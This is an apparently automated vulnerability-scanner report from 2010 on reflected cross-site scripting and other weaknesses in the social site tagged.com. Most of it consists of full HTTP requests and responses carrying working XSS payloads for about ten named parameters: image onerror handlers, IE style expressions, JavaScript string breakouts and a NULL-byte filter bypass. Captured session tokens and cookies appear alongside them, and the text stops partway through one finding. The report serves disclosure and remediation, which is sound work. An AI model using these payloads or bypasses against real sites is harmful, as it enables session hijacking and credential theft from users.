tagged.com, XSS, Cross Site Scripting, CWE-79, CAPEC-86

Cross Site Scripting in tagged.com | Vulnerability Crawler Report

Report generated by XSS.CX at Tue Dec 28 20:34:05 CST 2010.

Loading


1. Cross-site scripting (reflected)

1.1. http://www.tagged.com/api/ [data parameter]

1.2. http://www.tagged.com/api/ [data parameter]

1.3. http://www.tagged.com/api/ [format parameter]

1.4. http://www.tagged.com/api/ [ids parameter]

1.5. http://www.tagged.com/api/ [method parameter]

1.6. http://www.tagged.com/api/ [method parameter]

1.7. http://www.tagged.com/register.html [city parameter]

1.8. http://www.tagged.com/register.html [country parameter]

1.9. http://www.tagged.com/register.html [firstName parameter]

1.10. http://www.tagged.com/register.html [lastName parameter]

1.11. http://www.tagged.com/register.html [password parameter]

1.12. http://www.tagged.com/register.html [zipCode parameter]

2. Cleartext submission of password

2.1. http://www.tagged.com/

2.2. http://www.tagged.com/account_info.html

2.3. http://www.tagged.com/index.html

2.4. http://www.tagged.com/register.html

3. Session token in URL

3.1. http://www.tagged.com/api/

3.2. http://www.tagged.com/home.html

4. Password field submitted using GET method

5. Password field with autocomplete enabled

6. Cookie scoped to parent domain

6.1. http://www.tagged.com/logout.html

6.2. http://www.tagged.com/register.html

7. Cross-domain Referer leakage

7.1. http://www.tagged.com/help.html

7.2. http://www.tagged.com/index.html

7.3. http://www.tagged.com/register.html

7.4. http://www.tagged.com/search.html

7.5. http://www.tagged.com/terms_of_service.html

8. Cross-domain script include

8.1. http://www.tagged.com/

8.2. http://www.tagged.com/account_info.html

8.3. http://www.tagged.com/browse.html

8.4. http://www.tagged.com/exelator.html

8.5. http://www.tagged.com/find_groups.html

8.6. http://www.tagged.com/help.html

8.7. http://www.tagged.com/help.html

8.8. http://www.tagged.com/home.html

8.9. http://www.tagged.com/index.html

8.10. http://www.tagged.com/profile.html

8.11. http://www.tagged.com/register.html

8.12. http://www.tagged.com/safety.html

8.13. http://www.tagged.com/search.html

8.14. http://www.tagged.com/support.html

8.15. http://www.tagged.com/support.html

8.16. http://www.tagged.com/terms_of_service.html

9. Cookie without HttpOnly flag set

9.1. http://www.tagged.com/logout.html

9.2. http://www.tagged.com/register.html

10. Email addresses disclosed

10.1. http://www.tagged.com/account_info.html

10.2. http://www.tagged.com/api/

10.3. http://www.tagged.com/browse.html

10.4. http://www.tagged.com/find_groups.html

10.5. http://www.tagged.com/help.html

10.6. http://www.tagged.com/home.html

10.7. http://www.tagged.com/profile.html

10.8. http://www.tagged.com/register.html

10.9. http://www.tagged.com/safety.html

10.10. http://www.tagged.com/terms_of_service.html

11. Content type incorrectly stated

11.1. http://www.tagged.com/api/

11.2. http://www.tagged.com/favicon.ico



1. Cross-site scripting (reflected)  next
There are 12 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


1.1. http://www.tagged.com/api/ [data parameter]  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tagged.com
Path:   /api/

Issue detail

The value of the data request parameter is copied into the HTML document as plain text between tags. The payload daaba<img%20src%3da%20onerror%3dalert(1)>d9c1376791d2c3b4a was submitted in the data parameter. This input was echoed as daaba<img src=a onerror=alert(1)>d9c1376791d2c3b4a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /api/?application_id=user&format=json&session_token=t4urklho6estviojs26it3hs07&method=tagged.header.renderAlerts&callback=tagged.header.alerts.show&api_signature=&track=dgx456OR3u&method=tagged.util.echoIt&data=&callback=tagged.header.alerts.init&api_signature=&track=dgx456OR3u&method=tagged.util.echoIt&data=300daaba<img%20src%3da%20onerror%3dalert(1)>d9c1376791d2c3b4a&callback=TAGGED.api.startDefer&api_signature=&track=dgx456OR3u HTTP/1.1
Host: www.tagged.com
Proxy-Connection: keep-alive
Referer: http://www.tagged.com/account_info.html
Origin: http://www.tagged.com
X-Requested-With: XMLHttpRequest
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-159294429-1293588622548; __utmz=50703532.1293588625.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); S=t4urklho6estviojs26it3hs07; connect_status=-1; __utma=50703532.851797930.1293588625.1293588625.1293588625.1; __utmb=50703532.0.10.1293588625; __utmc=50703532

Response

HTTP/1.1 200 OK
Date: Wed, 29 Dec 2010 02:20:48 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 106

{"stat":"ok","diagnostics":"1 2.2 27.24","result":"300daaba<img src=a onerror=alert(1)>d9c1376791d2c3b4a"}

1.2. http://www.tagged.com/api/ [data parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tagged.com
Path:   /api/

Issue detail

The value of the data request parameter is copied into the HTML document as plain text between tags. The payload 546a9<img%20src%3da%20onerror%3dalert(1)>68378bef2a6 was submitted in the data parameter. This input was echoed as 546a9<img src=a onerror=alert(1)>68378bef2a6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

POST /api/?application_id=user&format=json&session_token=t4urklho6estviojs26it3hs07 HTTP/1.1
Host: www.tagged.com
Proxy-Connection: keep-alive
Referer: http://www.tagged.com/account_info.html
Origin: http://www.tagged.com
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-159294429-1293588622548; __utmz=50703532.1293588625.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); S=t4urklho6estviojs26it3hs07; connect_status=-1; __utma=50703532.851797930.1293588625.1293588625.1293588625.1; __utmb=50703532.0.10.1293588625; __utmc=50703532
Content-Length: 299


method=tagged.header.renderAlerts&callback=tagged.header.alerts.show&api_signature=&track=dgx456OR3u
method=tagged.util.echoIt&data=546a9<img%20src%3da%20onerror%3dalert(1)>68378bef2a6&callback=tagged.header.alerts.init&api_signature=&track=dgx456OR3u
method=tagged.util.echoIt&data=300&callback=TAGGED.api.startDefer&api_signature=&track=dgx456OR3u

Response

HTTP/1.1 200 OK
Date: Wed, 29 Dec 2010 02:20:23 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 263

["{\"stat\":\"ok\",\"diagnostics\":\"1 2.2 24.69\",\"result\":{\"HTML\":\"\"}}","{\"stat\":\"ok\",\"diagnostics\":\"0 2.3 24.69\",\"result\":\"546a9<img src=a onerror=alert(1)>68378bef2a6\"}","{\"stat\":\"ok\",\"diagnostics\":\"0 2.3 24.69\",\"result\":\"300\"}"]

1.3. http://www.tagged.com/api/ [format parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tagged.com
Path:   /api/

Issue detail

The value of the format request parameter is copied into the HTML document as plain text between tags. The payload aa996<img%20src%3da%20onerror%3dalert(1)>ba49b2dbe3e209c77 was submitted in the format parameter. This input was echoed as aa996<img src=a onerror=alert(1)>ba49b2dbe3e209c77 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /api/?application_id=user&format=jsonaa996<img%20src%3da%20onerror%3dalert(1)>ba49b2dbe3e209c77&session_token=t4urklho6estviojs26it3hs07&method=tagged.reg.logUserActions&actions=%7B%22email%22%3A1%2C%22first_name%22%3A1%2C%22last_name%22%3A1%2C%22birth_month%22%3A1%2C%22birth_day%22%3A1%2C%22birth_year%22%3A1%2C%22zipCode%22%3A1%2C%22password%22%3A1%7D&api_signature= HTTP/1.1
Host: www.tagged.com
Proxy-Connection: keep-alive
Referer: http://www.tagged.com/
Origin: http://www.tagged.com
X-Requested-With: XMLHttpRequest
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-159294429-1293588622548; __utmz=50703532.1293588625.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=50703532.851797930.1293588625.1293588625.1293588625.1; __utmb=50703532.0.10.1293588625; __utmc=50703532; S=t4urklho6estviojs26it3hs07

Response

HTTP/1.1 200 OK
Date: Wed, 29 Dec 2010 02:19:24 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 208

{"stat":"fail","diagnostics":"0 2.3 27.74","error":{"code":6,"message":"method (tagged.reg.logUserActions) parameter (format) has an unknown format (jsonaa996<img src=a onerror=alert(1)>ba49b2dbe3e209c77)."}}

1.4. http://www.tagged.com/api/ [ids parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tagged.com
Path:   /api/

Issue detail

The value of the ids request parameter is copied into the HTML document as plain text between tags. The payload c8242<img%20src%3da%20onerror%3dalert(1)>ef9354c1c7a53146d was submitted in the ids parameter. This input was echoed as c8242<img src=a onerror=alert(1)>ef9354c1c7a53146d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /api/?application_id=user&format=json&session_token=dvhiv3dhhk4sr6bc1ttavum794&method=tagged.reg.validate&ids=first_name%2Clast_name%2CzipCode%2Clocale%2Cemail%2Cpassword%2CtermsOfService%2Cc8242<img%20src%3da%20onerror%3dalert(1)>ef9354c1c7a53146d&values=%2C%2C%2Cen_US%2C%2C%2C%2C&api_signature= HTTP/1.1
Host: www.tagged.com
Proxy-Connection: keep-alive
Referer: http://www.tagged.com/
Origin: http://www.tagged.com
X-Requested-With: XMLHttpRequest
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: S=dvhiv3dhhk4sr6bc1ttavum794; __qca=P0-159294429-1293588622548; __utmz=50703532.1293588625.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=50703532.851797930.1293588625.1293588625.1293588625.1; __utmb=50703532.0.10.1293588625; __utmc=50703532

Response

HTTP/1.1 200 OK
Date: Wed, 29 Dec 2010 02:19:52 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 153

{"stat":"ok","diagnostics":"2 2.4 26.52","results":{"id":"c8242<img src=a onerror=alert(1)>ef9354c1c7a53146d","errors":["1020","1021","1024",1223,1227]}}

1.5. http://www.tagged.com/api/ [method parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tagged.com
Path:   /api/

Issue detail

The value of the method request parameter is copied into the HTML document as plain text between tags. The payload 7a49a<img%20src%3da%20onerror%3dalert(1)>eab47c7d5b9 was submitted in the method parameter. This input was echoed as 7a49a<img src=a onerror=alert(1)>eab47c7d5b9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

POST /api/?application_id=user&format=json&session_token=t4urklho6estviojs26it3hs07 HTTP/1.1
Host: www.tagged.com
Proxy-Connection: keep-alive
Referer: http://www.tagged.com/home.html
Origin: http://www.tagged.com
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-159294429-1293588622548; __utmz=50703532.1293588625.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=50703532.851797930.1293588625.1293588625.1293588625.1; __utmb=50703532.0.10.1293588625; __utmc=50703532; S=t4urklho6estviojs26it3hs07
Content-Length: 292


method=tagged.connect.getAccountInfos7a49a<img%20src%3da%20onerror%3dalert(1)>eab47c7d5b9&callback=tagged.header.connect.show&api_signature=&track=4RNVj27Lzx
method=tagged.connect.settings.getSettingsByFeature&feature=status&api_signature=&track=4RNVj27Lzx
method=tagged.announcements.get&
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Wed, 29 Dec 2010 02:20:00 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 520

{"stat":"fail","diagnostics":"0 2.1 24.75","error":{"code":2,"message":"Unsupported api (tagged.connect.getAccountInfos7a49a<img src=a onerror=alert(1)>eab47c7d5b9)."}}["{\"stat\":\"fail\",\"diagnostics\":\"0 2.1 24.75\",\"error\":{\"code\":3,\"message\":\"An unexpected error occurred. API method is broken.\"}}","{\"stat\":\"fail\",\"diagnostics\":\"0 2.3 24.75\
...[SNIP]...

1.6. http://www.tagged.com/api/ [method parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tagged.com
Path:   /api/

Issue detail

The value of the method request parameter is copied into the HTML document as plain text between tags. The payload dc272<img%20src%3da%20onerror%3dalert(1)>29f44677fa745c343 was submitted in the method parameter. This input was echoed as dc272<img src=a onerror=alert(1)>29f44677fa745c343 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /api/?application_id=user&format=json&session_token=t4urklho6estviojs26it3hs07&method=tagged.reg.logUserActionsdc272<img%20src%3da%20onerror%3dalert(1)>29f44677fa745c343&actions=%7B%22email%22%3A1%2C%22first_name%22%3A1%2C%22last_name%22%3A1%2C%22birth_month%22%3A1%2C%22birth_day%22%3A1%2C%22birth_year%22%3A1%2C%22zipCode%22%3A1%2C%22password%22%3A1%7D&api_signature= HTTP/1.1
Host: www.tagged.com
Proxy-Connection: keep-alive
Referer: http://www.tagged.com/
Origin: http://www.tagged.com
X-Requested-With: XMLHttpRequest
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-159294429-1293588622548; __utmz=50703532.1293588625.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=50703532.851797930.1293588625.1293588625.1293588625.1; __utmb=50703532.0.10.1293588625; __utmc=50703532; S=t4urklho6estviojs26it3hs07

Response

HTTP/1.1 200 OK
Date: Wed, 29 Dec 2010 02:19:35 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 169

{"stat":"fail","diagnostics":"0 2.1 27.68","error":{"code":2,"message":"Unsupported api (tagged.reg.logUserActionsdc272<img src=a onerror=alert(1)>29f44677fa745c343)."}}

1.7. http://www.tagged.com/register.html [city parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tagged.com
Path:   /register.html

Issue detail

The value of the city request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f017a"style%3d"x%3aexpression(alert(1))"a0f8014dbfd was submitted in the city parameter. This input was echoed as f017a"style="x:expression(alert(1))"a0f8014dbfd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

POST /register.html?page=index HTTP/1.1
Host: www.tagged.com
Proxy-Connection: keep-alive
Referer: http://www.tagged.com/
Cache-Control: max-age=0
Origin: http://www.tagged.com
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: S=dvhiv3dhhk4sr6bc1ttavum794; __qca=P0-159294429-1293588622548; __utmz=50703532.1293588625.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=50703532.851797930.1293588625.1293588625.1293588625.1; __utmb=50703532.0.10.1293588625; __utmc=50703532
Content-Length: 409

firstName=%27&lastName=%27&gender=F&birthMonth=1&birthDay=1&birthYear=1970&country=US&city=f017a"style%3d"x%3aexpression(alert(1))"a0f8014dbfd&zipCode=10010&locale=en_US&email=test%40fastdial.net&password=SkipIt1&recaptcha_challenge_field=03AHJ_Vuvg3Y2kXsGuPIlhWuyikRdBtIzqkOceUquqpJrOmviHwVhFQ6OCAr43ftTtvm9OgrSzWyPHupyuTYDkojw2BNp9Wk8cCdQHj
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Wed, 29 Dec 2010 02:21:17 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 30016

...<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>Tagged - Register</title>
<link rel="stylesheet" type="text/
...[SNIP]...
<input tabindex="6" type="text" name="city" value="f017a"style="x:expression(alert(1))"a0f8014dbfd"
id="city" class="search-fields-text" />
...[SNIP]...

1.8. http://www.tagged.com/register.html [country parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tagged.com
Path:   /register.html

Issue detail

The value of the country request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 15336"%3balert(1)//3ba577de2ef was submitted in the country parameter. This input was echoed as 15336";alert(1)//3ba577de2ef in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

POST /register.html?page=index HTTP/1.1
Host: www.tagged.com
Proxy-Connection: keep-alive
Referer: http://www.tagged.com/
Cache-Control: max-age=0
Origin: http://www.tagged.com
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: S=dvhiv3dhhk4sr6bc1ttavum794; __qca=P0-159294429-1293588622548; __utmz=50703532.1293588625.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=50703532.851797930.1293588625.1293588625.1293588625.1; __utmb=50703532.0.10.1293588625; __utmc=50703532
Content-Length: 409

firstName=%27&lastName=%27&gender=F&birthMonth=1&birthDay=1&birthYear=1970&country=US15336"%3balert(1)//3ba577de2ef&city=&zipCode=10010&locale=en_US&email=test%40fastdial.net&password=SkipIt1&recaptcha_challenge_field=03AHJ_Vuvg3Y2kXsGuPIlhWuyikRdBtIzqkOceUquqpJrOmviHwVhFQ6OCAr43ftTtvm9OgrSzWyPHupyuTYDkojw2BNp9Wk8
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Wed, 29 Dec 2010 02:21:06 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 30123

...<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>Tagged - Register</title>
<link rel="stylesheet" type="text/
...[SNIP]...
'inviterGender' : "M",
'baseURL' : "https://secure-static.tagged.com",
'tosURL' :"http://www.tagged.com/terms_of_service.html",
'prefillCountry' : "US15336";alert(1)//3ba577de2ef"
};
// }}}
// make sure that we show the right fields based on user country
tagged.regpath.regpage.errors = ["1023",1224,"1014"];
tagged.loadData({"locale":"en_
...[SNIP]...

1.9. http://www.tagged.com/register.html [firstName parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tagged.com
Path:   /register.html

Issue detail

The value of the firstName request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %006846a"style%3d"x%3aexpression(alert(1))"28a35c45c82 was submitted in the firstName parameter. This input was echoed as 6846a"style="x:expression(alert(1))"28a35c45c82 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

POST /register.html?page=index HTTP/1.1
Host: www.tagged.com
Proxy-Connection: keep-alive
Referer: http://www.tagged.com/
Cache-Control: max-age=0
Origin: http://www.tagged.com
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: S=dvhiv3dhhk4sr6bc1ttavum794; __qca=P0-159294429-1293588622548; __utmz=50703532.1293588625.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=50703532.851797930.1293588625.1293588625.1293588625.1; __utmb=50703532.0.10.1293588625; __utmc=50703532
Content-Length: 409

firstName=%27%006846a"style%3d"x%3aexpression(alert(1))"28a35c45c82&lastName=%27&gender=F&birthMonth=1&birthDay=1&birthYear=1970&country=US&city=&zipCode=10010&locale=en_US&email=test%40fastdial.net&password=SkipIt1&recaptcha_challenge_field=03AHJ_Vuvg3Y2kXsGuPIlhWuy
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Wed, 29 Dec 2010 02:20:50 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 30125

...<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>Tagged - Register</title>
<link rel="stylesheet" type="text/
...[SNIP]...
<input type="text" name="firstName" id="first_name" value="'6846a"style="x:expression(alert(1))"28a35c45c82" size="35" maxlength="35" tabindex="1"/>
...[SNIP]...

1.10. http://www.tagged.com/register.html [lastName parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tagged.com
Path:   /register.html

Issue detail

The value of the lastName request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 836e6"style%3d"x%3aexpression(alert(1))"1316b661e82 was submitted in the lastName parameter. This input was echoed as 836e6"style="x:expression(alert(1))"1316b661e82 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

POST /register.html?page=index HTTP/1.1
Host: www.tagged.com
Proxy-Connection: keep-alive
Referer: http://www.tagged.com/
Cache-Control: max-age=0
Origin: http://www.tagged.com
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: S=dvhiv3dhhk4sr6bc1ttavum794; __qca=P0-159294429-1293588622548; __utmz=50703532.1293588625.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=50703532.851797930.1293588625.1293588625.1293588625.1; __utmb=50703532.0.10.1293588625; __utmc=50703532
Content-Length: 409

firstName=%27&lastName=%27836e6"style%3d"x%3aexpression(alert(1))"1316b661e82&gender=F&birthMonth=1&birthDay=1&birthYear=1970&country=US&city=&zipCode=10010&locale=en_US&email=test%40fastdial.net&password=SkipIt1&recaptcha_challenge_field=03AHJ_Vuvg3Y2kXsGuPIlhWuyikRdBtIzqkOce
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Wed, 29 Dec 2010 02:21:01 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
